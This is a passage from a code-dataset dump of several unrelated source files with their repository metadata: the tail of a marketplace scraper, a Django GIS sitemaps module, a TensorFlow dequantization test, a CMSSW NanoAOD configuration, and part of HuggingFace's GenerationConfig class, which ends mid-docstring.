amplitude_id_2c1a3f70ab02cb610ab2905c0c4c63c6ralali.com=eyJkZXZpY2VJZCI6IjJkNDhlYTE5LWQ1MTctNDkxOC1hNTg4LTI1NDRhZTA5ZDlkNVIiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2NzEyOTEyMzgzNCwibGFzdEV2ZW50VGltZSI6MTU2NzEzNTE5NTUxNSwiZXZlbnRJZCI6MzMsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjozM30='
# }
# yield Request(url=res_url, headers=headers, callback=self.parse_detail)
# def parse_detail(self, response):
# # print(response.text)
# with open('jj.html', 'w', encoding='utf-8') as f:
# f.write(response.text)
# https://www.ralali.com/v/rantchromegarage/product/ach1001-belink-wireless-bluetooth-headset-100000092720001
| [
"2686162923@qq.com"
] | 2686162923@qq.com |
463b6bb70cca8e70a802d8985558490eaa73d7b1 | e845f7f61ff76b3c0b8f4d8fd98f6192e48d542a | /djangocg/contrib/gis/sitemaps/__init__.py | 6765153ec0be6d9dcc32bad86c6a4420403d07bf | [
"BSD-3-Clause"
] | permissive | timothyclemans/djangocg | fd150c028013cb5f53f5a3b4fdc960a07fdaaa78 | 52cf28e046523bceb5d436f8e6bf61e7d4ba6312 | refs/heads/master | 2021-01-18T13:20:13.636812 | 2012-08-31T23:38:14 | 2012-08-31T23:38:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | # Geo-enabled Sitemap classes.
from djangocg.contrib.gis.sitemaps.georss import GeoRSSSitemap
from djangocg.contrib.gis.sitemaps.kml import KMLSitemap, KMZSitemap
| [
"timothy.clemans@gmail.com"
] | timothy.clemans@gmail.com |
23f542b49fb43c3fa7f261c20d841f00b6768b43 | dce4a52986ddccea91fbf937bd89e0ae00b9d046 | /jni-build/jni/include/tensorflow/contrib/quantization/python/dequantize_op_test.py | b1d47cc4a2edcea49cb0798241f46968a19d166a | [
"MIT"
] | permissive | Lab603/PicEncyclopedias | 54a641b106b7bb2d2f71b2dacef1e5dbeaf773a6 | 6d39eeb66c63a6f0f7895befc588c9eb1dd105f9 | refs/heads/master | 2022-11-11T13:35:32.781340 | 2018-03-15T05:53:07 | 2018-03-15T05:53:07 | 103,941,664 | 6 | 3 | MIT | 2022-10-28T05:31:37 | 2017-09-18T13:20:47 | C++ | UTF-8 | Python | false | false | 3,108 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Dequantize Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
# TODO(petewarden) - Remove this ugly hack to get around Python linking problems
# with Bazel.
# pylint: disable=g-bad-import-order
from tensorflow.contrib.quantization import load_quantized_ops_so
from tensorflow.contrib.quantization.kernels import load_quantized_kernels_so
class DequantizeOpTest(tf.test.TestCase):
  """Checks tf.contrib.quantization.dequantize against a NumPy reference."""

  def __init__(self, method_name="runTest"):
    super(DequantizeOpTest, self).__init__(method_name)
    # The quantized op and kernel live in separately-loaded shared objects.
    load_quantized_ops_so.Load()
    load_quantized_kernels_so.Load()

  def _testDequantizeOp(self, inputs, min_range, max_range, dtype):
    """Dequantizes `inputs` and compares against a NumPy re-implementation.

    Args:
      inputs: 1-D numpy array of quantized integer values.
      min_range: float mapped to the smallest representable value.
      max_range: float mapped to the largest representable value.
      dtype: one of the tf quantized dtypes (quint8/qint8/quint16/qint16).
    """
    with self.test_session():
      input_op = tf.constant(inputs, shape=[len(inputs)], dtype=dtype)
      dequantized = tf.contrib.quantization.dequantize(
          input_op, min_range, max_range)
      tf_ans = dequantized.eval()

    # TODO(vrv): Add support for DT_QINT32 quantization if needed.
    type_dict = {
        tf.quint8: np.uint8,
        tf.qint8: np.int8,
        tf.quint16: np.uint16,
        tf.qint16: np.int16
    }
    # assertIn / assertGreaterEqual give clearer failure messages than the
    # original assertTrue(... in ... / ... >= ...) forms.
    self.assertIn(dtype, type_dict)
    v_max = np.iinfo(type_dict[dtype]).max
    v_min = np.iinfo(type_dict[dtype]).min
    self.assertGreaterEqual(min_range, v_min)
    self.assertLessEqual(max_range, v_max)
    type_range = v_max - v_min
    # Signed types are shifted by half the range so 0 maps to mid-scale.
    half_range = (type_range + 1) / 2 if v_min < 0 else 0.0

    np_ans = ((inputs.astype(np.float32) + half_range) *
              (max_range - min_range) / type_range) + min_range
    self.assertAllClose(tf_ans, np_ans)

  def testBasicQuint8(self):
    """Unsigned 8-bit dequantization over several ranges."""
    self._testDequantizeOp(np.array([0, 128, 255]),
                           0.0, 6.0, tf.quint8)
    self._testDequantizeOp(np.array([0, 128, 255]),
                           0.0, 123.456, tf.quint8)
    self._testDequantizeOp(np.array([0, 4, 42, 108, 243]),
                           5.0, 200.2, tf.quint8)

  def testBasicQint8(self):
    """Signed 8-bit dequantization over several ranges."""
    self._testDequantizeOp(np.array([-128, 0, 127]),
                           -1.0, 2.0, tf.qint8)
    self._testDequantizeOp(np.array([-2, 4, -17]),
                           -5.0, -3.0, tf.qint8)
    self._testDequantizeOp(np.array([0, -4, 42, -108]),
                           5.0, 40.0, tf.qint8)
if __name__ == "__main__":
tf.test.main()
| [
"super_mr.z@hotmail.comm"
] | super_mr.z@hotmail.comm |
a4a1b84ca118399239de8e69faf1ce3309a08cca | 9d0195aa83cc594a8c61f334b90375961e62d4fe | /JTTest/SL7/CMSSW_10_2_15/src/dataRunA/nano2902.py | b53a80eddc330e78e98987c0aef21725119e3d9b | [] | no_license | rsk146/CMS | 4e49592fc64f6438051544c5de18598db36ed985 | 5f8dab8c59ae556598b9747b52b88205fffc4dbe | refs/heads/master | 2022-12-01T03:57:12.126113 | 2020-08-04T03:29:27 | 2020-08-04T03:29:27 | 284,863,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,293 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: nanoAOD_jetToolbox_cff -s NANO --data --eventcontent NANOAOD --datatier NANOAOD --no_exec --conditions 102X_dataRun2_Sep2018Rereco_v1 --era Run2_2018,run2_nanoAOD_102Xv1 --customise_commands=process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False))) --customise JMEAnalysis/JetToolbox/nanoAOD_jetToolbox_cff.nanoJTB_customizeMC --filein /users/h2/rsk146/JTTest/SL7/CMSSW_10_6_12/src/ttbarCutTest/dataReprocessing/0004A5E9-9F18-6B42-B31D-4206406CE423.root --fileout file:jetToolbox_nano_datatest.root
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras

# CMSSW process that converts 2018 Run A EGamma MINIAOD data to NANOAOD.
process = cms.Process('NANO',eras.Run2_2018,eras.run2_nanoAOD_102Xv1)

# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('PhysicsTools.NanoAOD.nano_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')

# -1 means: process every event in the input file.
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(-1)
)

# Input source
process.source = cms.Source("PoolSource",
    fileNames = cms.untracked.vstring('file:root://cms-xrd-global.cern.ch//store/data/Run2018A/EGamma/MINIAOD/17Sep2018-v2/270000/A117AAC6-171B-5D40-930E-6F3CD438F89A.root'),
    secondaryFileNames = cms.untracked.vstring()
)

process.options = cms.untracked.PSet(

)

# Production Info
process.configurationMetadata = cms.untracked.PSet(
    annotation = cms.untracked.string('nanoAOD_jetToolbox_cff nevts:1'),
    name = cms.untracked.string('Applications'),
    version = cms.untracked.string('$Revision: 1.19 $')
)

# Output definition
process.NANOAODoutput = cms.OutputModule("NanoAODOutputModule",
    compressionAlgorithm = cms.untracked.string('LZMA'),
    compressionLevel = cms.untracked.int32(9),
    dataset = cms.untracked.PSet(
        dataTier = cms.untracked.string('NANOAOD'),
        filterName = cms.untracked.string('')
    ),
    fileName = cms.untracked.string('file:jetToolbox_nano_datatest2902.root'),
    outputCommands = process.NANOAODEventContent.outputCommands
)

# Additional output definition

# Other statements
# Conditions: Sep2018 re-reco global tag for 2018 data.
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_dataRun2_Sep2018Rereco_v1', '')

# Path and EndPath definitions
process.nanoAOD_step = cms.Path(process.nanoSequence)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.NANOAODoutput_step = cms.EndPath(process.NANOAODoutput)

# Schedule definition
process.schedule = cms.Schedule(process.nanoAOD_step,process.endjob_step,process.NANOAODoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)

# customisation of the process.

# Automatic addition of the customisation function from PhysicsTools.NanoAOD.nano_cff
from PhysicsTools.NanoAOD.nano_cff import nanoAOD_customizeData
#call to customisation function nanoAOD_customizeData imported from PhysicsTools.NanoAOD.nano_cff
process = nanoAOD_customizeData(process)

# Automatic addition of the customisation function from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff import nanoJTB_customizeMC
#call to customisation function nanoJTB_customizeMC imported from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
process = nanoJTB_customizeMC(process)

# End of customisation functions

# Customisation from command line
# Disable ROOT's implicit multi-threading (IMT) for this job.
process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False)))
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion | [
"rsk146@scarletmail.rutgers.edu"
] | rsk146@scarletmail.rutgers.edu |
e8f26b30bed768cd2432f809e12143485fcfd8da | 19a2378a7fc2aef762b0e3a70669208818feeaa9 | /src/transformers/generation/configuration_utils.py | 096424b8585b5d2dfa69598f8fe2c263216ca0e2 | [
"Apache-2.0"
] | permissive | pytorch-tpu/transformers | 494ee005c6d156161171f2a8e60f25603189408f | 6112b1c6442aaf7affd2b0676a1cd4eee30c45cf | refs/heads/master | 2023-09-03T19:34:30.326852 | 2023-07-19T20:57:40 | 2023-07-19T20:57:40 | 220,075,881 | 7 | 2 | Apache-2.0 | 2023-09-14T17:58:25 | 2019-11-06T19:40:45 | Python | UTF-8 | Python | false | false | 40,270 | py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Generation configuration class and utilities."""
import copy
import json
import os
import warnings
from typing import Any, Dict, Optional, Union
from .. import __version__
from ..configuration_utils import PretrainedConfig
from ..utils import (
GENERATION_CONFIG_NAME,
PushToHubMixin,
cached_file,
download_url,
extract_commit_hash,
is_remote_url,
logging,
)
logger = logging.get_logger(__name__)
class GenerationConfig(PushToHubMixin):
r"""
Class that holds a configuration for a generation task. A `generate` call supports the following generation methods
for text-decoder, text-to-text, speech-to-text, and vision-to-text models:
- *greedy decoding* by calling [`~generation.GenerationMixin.greedy_search`] if `num_beams=1` and
`do_sample=False`
- *contrastive search* by calling [`~generation.GenerationMixin.contrastive_search`] if `penalty_alpha>0.`
and `top_k>1`
- *multinomial sampling* by calling [`~generation.GenerationMixin.sample`] if `num_beams=1` and
`do_sample=True`
- *beam-search decoding* by calling [`~generation.GenerationMixin.beam_search`] if `num_beams>1` and
`do_sample=False`
- *beam-search multinomial sampling* by calling [`~generation.GenerationMixin.beam_sample`] if
`num_beams>1` and `do_sample=True`
- *diverse beam-search decoding* by calling [`~generation.GenerationMixin.group_beam_search`], if
`num_beams>1` and `num_beam_groups>1`
- *constrained beam-search decoding* by calling [`~generation.GenerationMixin.constrained_beam_search`], if
`constraints!=None` or `force_words_ids!=None`
- *assisted decoding* by calling [`~generation.GenerationMixin.assisted_decoding`], if
`assistant_model` is passed to `.generate()`
You do not need to call any of the above methods directly. Pass custom parameter values to '.generate()'. To learn
more about decoding strategies refer to the [text generation strategies guide](../generation_strategies).
Arg:
> Parameters that control the length of the output
max_length (`int`, *optional*, defaults to 20):
The maximum length the generated tokens can have. Corresponds to the length of the input prompt +
`max_new_tokens`. Its effect is overridden by `max_new_tokens`, if also set.
max_new_tokens (`int`, *optional*):
The maximum numbers of tokens to generate, ignoring the number of tokens in the prompt.
min_length (`int`, *optional*, defaults to 0):
The minimum length of the sequence to be generated. Corresponds to the length of the input prompt +
`min_new_tokens`. Its effect is overridden by `min_new_tokens`, if also set.
min_new_tokens (`int`, *optional*):
The minimum numbers of tokens to generate, ignoring the number of tokens in the prompt.
early_stopping (`bool` or `str`, *optional*, defaults to `False`):
Controls the stopping condition for beam-based methods, like beam-search. It accepts the following values:
`True`, where the generation stops as soon as there are `num_beams` complete candidates; `False`, where an
heuristic is applied and the generation stops when is it very unlikely to find better candidates;
`"never"`, where the beam search procedure only stops when there cannot be better candidates (canonical
beam search algorithm).
max_time(`float`, *optional*):
The maximum amount of time you allow the computation to run for in seconds. generation will still finish
the current pass after allocated time has been passed.
> Parameters that control the generation strategy used
do_sample (`bool`, *optional*, defaults to `False`):
Whether or not to use sampling ; use greedy decoding otherwise.
num_beams (`int`, *optional*, defaults to 1):
Number of beams for beam search. 1 means no beam search.
num_beam_groups (`int`, *optional*, defaults to 1):
Number of groups to divide `num_beams` into in order to ensure diversity among different groups of beams.
[this paper](https://arxiv.org/pdf/1610.02424.pdf) for more details.
penalty_alpha (`float`, *optional*):
The values balance the model confidence and the degeneration penalty in contrastive search decoding.
use_cache (`bool`, *optional*, defaults to `True`):
Whether or not the model should use the past last key/values attentions (if applicable to the model) to
speed up decoding.
> Parameters for manipulation of the model output logits
temperature (`float`, *optional*, defaults to 1.0):
The value used to modulate the next token probabilities.
top_k (`int`, *optional*, defaults to 50):
The number of highest probability vocabulary tokens to keep for top-k-filtering.
top_p (`float`, *optional*, defaults to 1.0):
If set to float < 1, only the smallest set of most probable tokens with probabilities that add up to
`top_p` or higher are kept for generation.
typical_p (`float`, *optional*, defaults to 1.0):
Local typicality measures how similar the conditional probability of predicting a target token next is to
the expected conditional probability of predicting a random token next, given the partial text already
generated. If set to float < 1, the smallest set of the most locally typical tokens with probabilities that
add up to `typical_p` or higher are kept for generation. See [this
paper](https://arxiv.org/pdf/2202.00666.pdf) for more details.
epsilon_cutoff (`float`, *optional*, defaults to 0.0):
If set to float strictly between 0 and 1, only tokens with a conditional probability greater than
`epsilon_cutoff` will be sampled. In the paper, suggested values range from 3e-4 to 9e-4, depending on the
size of the model. See [Truncation Sampling as Language Model
Desmoothing](https://arxiv.org/abs/2210.15191) for more details.
eta_cutoff (`float`, *optional*, defaults to 0.0):
Eta sampling is a hybrid of locally typical sampling and epsilon sampling. If set to float strictly between
0 and 1, a token is only considered if it is greater than either `eta_cutoff` or `sqrt(eta_cutoff) *
exp(-entropy(softmax(next_token_logits)))`. The latter term is intuitively the expected next token
probability, scaled by `sqrt(eta_cutoff)`. In the paper, suggested values range from 3e-4 to 2e-3,
depending on the size of the model. See [Truncation Sampling as Language Model
Desmoothing](https://arxiv.org/abs/2210.15191) for more details.
diversity_penalty (`float`, *optional*, defaults to 0.0):
This value is subtracted from a beam's score if it generates a token same as any beam from other group at a
particular time. Note that `diversity_penalty` is only effective if `group beam search` is enabled.
repetition_penalty (`float`, *optional*, defaults to 1.0):
The parameter for repetition penalty. 1.0 means no penalty. See [this
paper](https://arxiv.org/pdf/1909.05858.pdf) for more details.
encoder_repetition_penalty (`float`, *optional*, defaults to 1.0):
The paramater for encoder_repetition_penalty. An exponential penalty on sequences that are not in the
original input. 1.0 means no penalty.
length_penalty (`float`, *optional*, defaults to 1.0):
Exponential penalty to the length that is used with beam-based generation. It is applied as an exponent to
the sequence length, which in turn is used to divide the score of the sequence. Since the score is the log
likelihood of the sequence (i.e. negative), `length_penalty` > 0.0 promotes longer sequences, while
`length_penalty` < 0.0 encourages shorter sequences.
no_repeat_ngram_size (`int`, *optional*, defaults to 0):
If set to int > 0, all ngrams of that size can only occur once.
bad_words_ids(`List[List[int]]`, *optional*):
List of list of token ids that are not allowed to be generated. Check
[`~generation.NoBadWordsLogitsProcessor`] for further documentation and examples.
force_words_ids(`List[List[int]]` or `List[List[List[int]]]`, *optional*):
List of token ids that must be generated. If given a `List[List[int]]`, this is treated as a simple list of
words that must be included, the opposite to `bad_words_ids`. If given `List[List[List[int]]]`, this
triggers a [disjunctive constraint](https://github.com/huggingface/transformers/issues/14081), where one
can allow different forms of each word.
renormalize_logits (`bool`, *optional*, defaults to `False`):
Whether to renormalize the logits after applying all the logits processors or warpers (including the custom
ones). It's highly recommended to set this flag to `True` as the search algorithms suppose the score logits
are normalized but some logit processors or warpers break the normalization.
constraints (`List[Constraint]`, *optional*):
Custom constraints that can be added to the generation to ensure that the output will contain the use of
certain tokens as defined by `Constraint` objects, in the most sensible way possible.
forced_bos_token_id (`int`, *optional*, defaults to `model.config.forced_bos_token_id`):
The id of the token to force as the first generated token after the `decoder_start_token_id`. Useful for
multilingual models like [mBART](../model_doc/mbart) where the first generated token needs to be the target
language token.
forced_eos_token_id (`Union[int, List[int]]`, *optional*, defaults to `model.config.forced_eos_token_id`):
The id of the token to force as the last generated token when `max_length` is reached. Optionally, use a
list to set multiple *end-of-sequence* tokens.
remove_invalid_values (`bool`, *optional*, defaults to `model.config.remove_invalid_values`):
Whether to remove possible *nan* and *inf* outputs of the model to prevent the generation method to crash.
Note that using `remove_invalid_values` can slow down generation.
exponential_decay_length_penalty (`tuple(int, float)`, *optional*):
This Tuple adds an exponentially increasing length penalty, after a certain amount of tokens have been
generated. The tuple shall consist of: `(start_index, decay_factor)` where `start_index` indicates where
penalty starts and `decay_factor` represents the factor of exponential decay
suppress_tokens (`List[int]`, *optional*):
A list of tokens that will be suppressed at generation. The `SupressTokens` logit processor will set their
log probs to `-inf` so that they are not sampled.
begin_suppress_tokens (`List[int]`, *optional*):
A list of tokens that will be suppressed at the beginning of the generation. The `SupressBeginTokens` logit
processor will set their log probs to `-inf` so that they are not sampled.
forced_decoder_ids (`List[List[int]]`, *optional*):
A list of pairs of integers which indicates a mapping from generation indices to token indices that will be
forced before sampling. For example, `[[1, 123]]` means the second generated token will always be a token
of index 123.
sequence_bias (`Dict[Tuple[int], float]`, *optional*)):
Dictionary that maps a sequence of tokens to its bias term. Positive biases increase the odds of the
sequence being selected, while negative biases do the opposite. Check
[`~generation.SequenceBiasLogitsProcessor`] for further documentation and examples.
guidance_scale (`float`, *optional*):
The guidance scale for classifier free guidance (CFG). CFG is enabled by setting `guidance_scale > 1`.
Higher guidance scale encourages the model to generate samples that are more closely linked to the input
prompt, usually at the expense of poorer quality.
> Parameters that define the output variables of `generate`
num_return_sequences(`int`, *optional*, defaults to 1):
The number of independently computed returned sequences for each element in the batch.
output_attentions (`bool`, *optional*, defaults to `False`):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more details.
output_hidden_states (`bool`, *optional*, defaults to `False`):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more details.
output_scores (`bool`, *optional*, defaults to `False`):
Whether or not to return the prediction scores. See `scores` under returned tensors for more details.
return_dict_in_generate (`bool`, *optional*, defaults to `False`):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
> Special tokens that can be used at generation time
pad_token_id (`int`, *optional*):
The id of the *padding* token.
bos_token_id (`int`, *optional*):
The id of the *beginning-of-sequence* token.
eos_token_id (`Union[int, List[int]]`, *optional*):
The id of the *end-of-sequence* token. Optionally, use a list to set multiple *end-of-sequence* tokens.
> Generation parameters exclusive to encoder-decoder models
encoder_no_repeat_ngram_size (`int`, *optional*, defaults to 0):
If set to int > 0, all ngrams of that size that occur in the `encoder_input_ids` cannot occur in the
`decoder_input_ids`.
decoder_start_token_id (`int`, *optional*):
If an encoder-decoder model starts decoding with a different token than *bos*, the id of that token.
> Wild card
generation_kwargs:
Additional generation kwargs will be forwarded to the `generate` function of the model. Kwargs that are not
present in `generate`'s signature will be used in the model forward pass.
"""
    def __init__(self, **kwargs):
        """Build a generation configuration from keyword arguments.

        Every known generation parameter is popped from ``kwargs`` with its
        documented default; any keys left over are set as extra attributes
        (unless the config is being built from a model config file, see below).
        Finishes by calling :meth:`validate` on the resulting values.
        """
        # Parameters that control the length of the output
        self.max_length = kwargs.pop("max_length", 20)
        self.max_new_tokens = kwargs.pop("max_new_tokens", None)
        self.min_length = kwargs.pop("min_length", 0)
        self.min_new_tokens = kwargs.pop("min_new_tokens", None)
        self.early_stopping = kwargs.pop("early_stopping", False)
        self.max_time = kwargs.pop("max_time", None)
        # Parameters that control the generation strategy used
        self.do_sample = kwargs.pop("do_sample", False)
        self.num_beams = kwargs.pop("num_beams", 1)
        self.num_beam_groups = kwargs.pop("num_beam_groups", 1)
        self.penalty_alpha = kwargs.pop("penalty_alpha", None)
        self.use_cache = kwargs.pop("use_cache", True)
        # Parameters for manipulation of the model output logits
        self.temperature = kwargs.pop("temperature", 1.0)
        self.top_k = kwargs.pop("top_k", 50)
        self.top_p = kwargs.pop("top_p", 1.0)
        self.typical_p = kwargs.pop("typical_p", 1.0)
        self.epsilon_cutoff = kwargs.pop("epsilon_cutoff", 0.0)
        self.eta_cutoff = kwargs.pop("eta_cutoff", 0.0)
        self.diversity_penalty = kwargs.pop("diversity_penalty", 0.0)
        self.repetition_penalty = kwargs.pop("repetition_penalty", 1.0)
        self.encoder_repetition_penalty = kwargs.pop("encoder_repetition_penalty", 1.0)
        self.length_penalty = kwargs.pop("length_penalty", 1.0)
        self.no_repeat_ngram_size = kwargs.pop("no_repeat_ngram_size", 0)
        self.bad_words_ids = kwargs.pop("bad_words_ids", None)
        self.force_words_ids = kwargs.pop("force_words_ids", None)
        self.renormalize_logits = kwargs.pop("renormalize_logits", False)
        self.constraints = kwargs.pop("constraints", None)
        self.forced_bos_token_id = kwargs.pop("forced_bos_token_id", None)
        self.forced_eos_token_id = kwargs.pop("forced_eos_token_id", None)
        self.remove_invalid_values = kwargs.pop("remove_invalid_values", False)
        self.exponential_decay_length_penalty = kwargs.pop("exponential_decay_length_penalty", None)
        self.suppress_tokens = kwargs.pop("suppress_tokens", None)
        self.begin_suppress_tokens = kwargs.pop("begin_suppress_tokens", None)
        self.forced_decoder_ids = kwargs.pop("forced_decoder_ids", None)
        self.sequence_bias = kwargs.pop("sequence_bias", None)
        self.guidance_scale = kwargs.pop("guidance_scale", None)
        # Parameters that define the output variables of `generate`
        self.num_return_sequences = kwargs.pop("num_return_sequences", 1)
        self.output_attentions = kwargs.pop("output_attentions", False)
        self.output_hidden_states = kwargs.pop("output_hidden_states", False)
        self.output_scores = kwargs.pop("output_scores", False)
        self.return_dict_in_generate = kwargs.pop("return_dict_in_generate", False)
        # Special tokens that can be used at generation time
        self.pad_token_id = kwargs.pop("pad_token_id", None)
        self.bos_token_id = kwargs.pop("bos_token_id", None)
        self.eos_token_id = kwargs.pop("eos_token_id", None)
        # Generation parameters exclusive to encoder-decoder models
        self.encoder_no_repeat_ngram_size = kwargs.pop("encoder_no_repeat_ngram_size", 0)
        self.decoder_start_token_id = kwargs.pop("decoder_start_token_id", None)
        # Wild card
        self.generation_kwargs = kwargs.pop("generation_kwargs", {})
        # The remaining attributes do not parametrize `.generate()`, but are informative and/or used by the hub
        # interface.
        self._from_model_config = kwargs.pop("_from_model_config", False)
        self._commit_hash = kwargs.pop("_commit_hash", None)
        self.transformers_version = kwargs.pop("transformers_version", __version__)
        # Additional attributes without default values
        if not self._from_model_config:
            # we don't want to copy values from the model config if we're initializing a `GenerationConfig` from a
            # model's default configuration file
            for key, value in kwargs.items():
                try:
                    setattr(self, key, value)
                except AttributeError as err:
                    # e.g. the key collides with a read-only property on the class
                    logger.error(f"Can't set {key} with value {value} for {self}")
                    raise err
        # Validate the values of the attributes
        self.validate()
def __eq__(self, other):
if not isinstance(other, GenerationConfig):
return False
self_dict = self.__dict__.copy()
other_dict = other.__dict__.copy()
# ignore metadata
for metadata_field in ("_from_model_config", "_commit_hash", "transformers_version"):
self_dict.pop(metadata_field, None)
other_dict.pop(metadata_field, None)
return self_dict == other_dict
def __repr__(self):
return f"{self.__class__.__name__} {self.to_json_string()}"
def validate(self):
"""
Validates the values of the attributes of the GenerationConfig instance, and raises a `ValueError` if any of
the values are invalid.
"""
if self.early_stopping not in {True, False, "never"}:
raise ValueError(f"`early_stopping` must be a boolean or 'never', but is {self.early_stopping}.")
    def save_pretrained(
        self,
        save_directory: Union[str, os.PathLike],
        config_file_name: Optional[Union[str, os.PathLike]] = None,
        push_to_hub: bool = False,
        **kwargs,
    ):
        r"""
        Save a generation configuration object to the directory `save_directory`, so that it can be re-loaded using the
        [`~GenerationConfig.from_pretrained`] class method.
        Args:
            save_directory (`str` or `os.PathLike`):
                Directory where the configuration JSON file will be saved (will be created if it does not exist).
            config_file_name (`str` or `os.PathLike`, *optional*, defaults to `"generation_config.json"`):
                Name of the generation configuration JSON file to be saved in `save_directory`.
            push_to_hub (`bool`, *optional*, defaults to `False`):
                Whether or not to push your model to the Hugging Face model hub after saving it. You can specify the
                repository you want to push to with `repo_id` (will default to the name of `save_directory` in your
                namespace).
            kwargs (`Dict[str, Any]`, *optional*):
                Additional key word arguments passed along to the [`~utils.PushToHubMixin.push_to_hub`] method.
        """
        config_file_name = config_file_name if config_file_name is not None else GENERATION_CONFIG_NAME
        # the target must be a directory; refuse to clobber an existing file
        if os.path.isfile(save_directory):
            raise AssertionError(f"Provided path ({save_directory}) should be a directory, not a file")
        os.makedirs(save_directory, exist_ok=True)
        if push_to_hub:
            # snapshot repo state before writing, so only modified files get uploaded below
            commit_message = kwargs.pop("commit_message", None)
            repo_id = kwargs.pop("repo_id", save_directory.split(os.path.sep)[-1])
            repo_id = self._create_repo(repo_id, **kwargs)
            files_timestamps = self._get_files_timestamps(save_directory)
        output_config_file = os.path.join(save_directory, config_file_name)
        # use_diff=True: only values differing from the defaults are written
        self.to_json_file(output_config_file, use_diff=True)
        logger.info(f"Configuration saved in {output_config_file}")
        if push_to_hub:
            self._upload_modified_files(
                save_directory,
                repo_id,
                files_timestamps,
                commit_message=commit_message,
                # NOTE(review): reads the legacy `use_auth_token` kwarg here; confirm callers pass it this way
                token=kwargs.get("use_auth_token"),
            )
    @classmethod
    def from_pretrained(
        cls,
        pretrained_model_name: Union[str, os.PathLike],
        config_file_name: Optional[Union[str, os.PathLike]] = None,
        cache_dir: Optional[Union[str, os.PathLike]] = None,
        force_download: bool = False,
        local_files_only: bool = False,
        token: Optional[Union[str, bool]] = None,
        revision: str = "main",
        **kwargs,
    ) -> "GenerationConfig":
        r"""
        Instantiate a [`GenerationConfig`] from a generation configuration file.
        Args:
            pretrained_model_name (`str` or `os.PathLike`):
                This can be either:
                - a string, the *model id* of a pretrained model configuration hosted inside a model repo on
                  huggingface.co. Valid model ids can be located at the root-level, like `bert-base-uncased`, or
                  namespaced under a user or organization name, like `dbmdz/bert-base-german-cased`.
                - a path to a *directory* containing a configuration file saved using the
                  [`~GenerationConfig.save_pretrained`] method, e.g., `./my_model_directory/`.
            config_file_name (`str` or `os.PathLike`, *optional*, defaults to `"generation_config.json"`):
                Name of the generation configuration JSON file to be loaded from `pretrained_model_name`.
            cache_dir (`str` or `os.PathLike`, *optional*):
                Path to a directory in which a downloaded pretrained model configuration should be cached if the
                standard cache should not be used.
            force_download (`bool`, *optional*, defaults to `False`):
                Whether or not to force to (re-)download the configuration files and override the cached versions if
                they exist.
            resume_download (`bool`, *optional*, defaults to `False`):
                Whether or not to delete incompletely received file. Attempts to resume the download if such a file
                exists.
            proxies (`Dict[str, str]`, *optional*):
                A dictionary of proxy servers to use by protocol or endpoint, e.g., `{'http': 'foo.bar:3128',
                'http://hostname': 'foo.bar:4012'}.` The proxies are used on each request.
            token (`str` or `bool`, *optional*):
                The token to use as HTTP bearer authorization for remote files. If `True`, or not specified, will use
                the token generated when running `huggingface-cli login` (stored in `~/.huggingface`).
            revision (`str`, *optional*, defaults to `"main"`):
                The specific model version to use. It can be a branch name, a tag name, or a commit id, since we use a
                git-based system for storing models and other artifacts on huggingface.co, so `revision` can be any
                identifier allowed by git.
        <Tip>
        To test a pull request you made on the Hub, you can pass `revision="refs/pr/<pr_number>"`.
        </Tip>
            return_unused_kwargs (`bool`, *optional*, defaults to `False`):
                If `False`, then this function returns just the final configuration object.
                If `True`, then this functions returns a `Tuple(config, unused_kwargs)` where *unused_kwargs* is a
                dictionary consisting of the key/value pairs whose keys are not configuration attributes: i.e., the
                part of `kwargs` which has not been used to update `config` and is otherwise ignored.
            subfolder (`str`, *optional*, defaults to `""`):
